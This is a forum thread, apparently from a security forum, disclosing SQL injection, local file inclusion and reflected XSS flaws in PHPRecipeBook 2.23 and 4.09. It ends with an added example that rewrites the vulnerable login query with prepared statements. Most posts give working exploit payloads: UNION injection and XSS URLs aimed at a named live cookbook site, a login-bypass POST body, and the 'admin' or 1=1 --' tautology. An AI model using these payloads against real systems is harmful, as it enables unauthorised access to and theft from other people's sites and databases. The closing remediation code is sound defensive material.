View full version: PHPRecipeBook 2.23


HAXTA4OK
10.11.2009, 01:00
Vulnerability: SQL

File modules\recipes\search.php

if ($_REQUEST) $query .= " recipe_course=" . $_REQUEST . " AND";
if ($_REQUEST) $query .= " recipe_base=" . $_REQUEST . " AND";
if ($_REQUEST) $query .= " recipe_ethnic=" . $_REQUEST . " AND";
if ($_REQUEST) $query .= " recipe_prep_time=" . $_REQUEST . " AND";
if ($_REQUEST) $query .= " recipe_difficulty=" . $_REQUEST . " AND";

The query itself is further up in that file; no time to look for it.

__http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7--

Vulnerability: LFI
Conditions: MQ=off

File index.php

$m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes';
$a = isset( $_GET['a'] ) ? $_GET['a'] : 'index';
include "modules/$m/$a.php";


__http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id=10


Went to bed, it's late, will finish it off tomorrow

HAXTA4OK
10.11.2009, 11:01
Vulnerability: Blind SQL

File: modules\recipes\view.php

$recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0;
$show_ratings = isset ($_GET['show_ratings'] ) ? true : false;
$show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings;

#Construct the query and do most of the setup first, then print the html
$sql = "SELECT $db_table_recipes.*,
ethnic_desc,
base_desc,
course_desc,
time_desc,
difficult_desc,
user_name
FROM $db_table_recipes
LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic
LEFT JOIN $db_table_bases ON base_id = recipe_base
LEFT JOIN $db_table_courses ON course_id = recipe_course
LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time
LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty
LEFT JOIN $db_table_users ON user_login = recipe_owner
WHERE recipe_id = $recipe_id";


Vulnerability: LFI

if (!empty( $_REQUEST['dosql'] )) {
    include "modules/$m/".$_REQUEST['dosql'].".php";
}


__http://www.bergiescookbook.com/cookbook/index.php?dosql='

Vulnerability: pXSS

<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a>


Personally, it was this code that made me go looking for XSS, am I right??

_http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E

Jokester
23.04.2010, 15:37
РОА leak

YaBtr
06.05.2014, 15:36
PhpRecipeBook 4.09

SQL injection

Vulnerable POST parameter: sm_login_id

Dependencies: mq = off

Vector: union-query

Vulnerable code:

$sm_login_id = isset($_POST['sm_login_id']) ? $_POST['sm_login_id'] : '';
$sm_password = isset($_POST['sm_password']) ? $_POST['sm_password'] : '';

if ($sm_login_id != "") {
    // try login if they are passing us a login ID
    if (!$SMObj->login($sm_login_id, $sm_password)) {
        $SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.'));
    }
}

The login function:

function login($login = '', $password = '') {
    if ($login == "" && $login == "") {
        $login = $this->_autoLoginUser;
        $password = $this->_autoLoginPasswd;
    }
    // user input is concatenated straight into the quoted SQL string
    $sql = "SELECT * FROM " . $this->_db_table_prefix . $this->_db_table_users .
        " WHERE user_login = '$login' AND user_password = '" . md5($password) . "'";
    // ...
}

Exploit:

POST /phprecipebook/index.php HTTP/1.1
Host: 127.0.0.1
...
sm_login_id=
'union select concat_ws(0x3a,version(),database(),user()),2,3,4, 5,6,7,8,9,10+--+
&sm_password=antichat


Passive XSS (reflected)

Vulnerable parameter: keywords

Dependencies: mq = off

Vulnerable code:



Exploit:

127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords=">alert('Antichat')&search=yes

Тр⚡️ха
06.05.2014, 17:58
YaBtr, lol, why a union here, judging by the code this would work just as well:

admin' or 1=1 --

YaBtr
06.05.2014, 18:49
YaBtr, lol, why a union here, judging by the code this would work just as well:
admin' or 1=1 --


Of course, I overlooked that, no argument!
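
As an added example (not PHPRecipeBook's own code), here is the login() query from YaBtr's post rebuilt with a prepared statement, which is also what makes the admin' or 1=1 -- tautology from the last two replies harmless. It assumes a PDO connection and a hypothetical users table (user_login, user_password) storing password_hash() hashes instead of the project's md5 column; the in-memory SQLite database is constructed only so the snippet runs stand-alone.

```php
<?php
// Added example, not code from PHPRecipeBook: the vulnerable login() query
// rewritten so that $login and $password are bound as data and can never
// terminate the quoted SQL string. Hypothetical schema: users(user_login, user_password).

function buildPdo(): PDO {
    // Constructed in-memory database with one sample account (not real data).
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE users (user_login TEXT PRIMARY KEY, user_password TEXT NOT NULL)");
    $ins = $pdo->prepare("INSERT INTO users (user_login, user_password) VALUES (:login, :hash)");
    $ins->execute([':login' => 'admin', ':hash' => password_hash('s3cret', PASSWORD_DEFAULT)]);
    return $pdo;
}

// Safe replacement for login(): one placeholder per value, and the password is
// verified in PHP against the stored hash instead of being compared inside SQL.
// (On MySQL also set PDO::ATTR_EMULATE_PREPARES to false so the server binds the values.)
function login(PDO $pdo, string $login, string $password): bool {
    if ($login === '') {
        return false;                       // no silent fallback to an auto-login account
    }
    $stmt = $pdo->prepare("SELECT user_password FROM users WHERE user_login = :login");
    $stmt->execute([':login' => $login]);   // the whole $login string is a single literal
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;                       // unknown user
    }
    return password_verify($password, $row['user_password']);
}

$pdo = buildPdo();
// The tautology payload from the thread is now just a user name that does not exist.
var_dump(login($pdo, "admin' or 1=1 --", 'anything'));
// The union payload from the POST body is likewise bound as a literal.
var_dump(login($pdo, "' union select 1,2,3,4,5,6,7,8,9,10 -- ", 'anything'));
// Only the real credentials succeed.
var_dump(login($pdo, 'admin', 's3cret'));
var_dump(login($pdo, 'admin', 'wrong'));
```

The same rule applies to the search.php and view.php queries in the first post: every value taken from $_GET, $_POST or $_REQUEST goes through a placeholder, never through string concatenation.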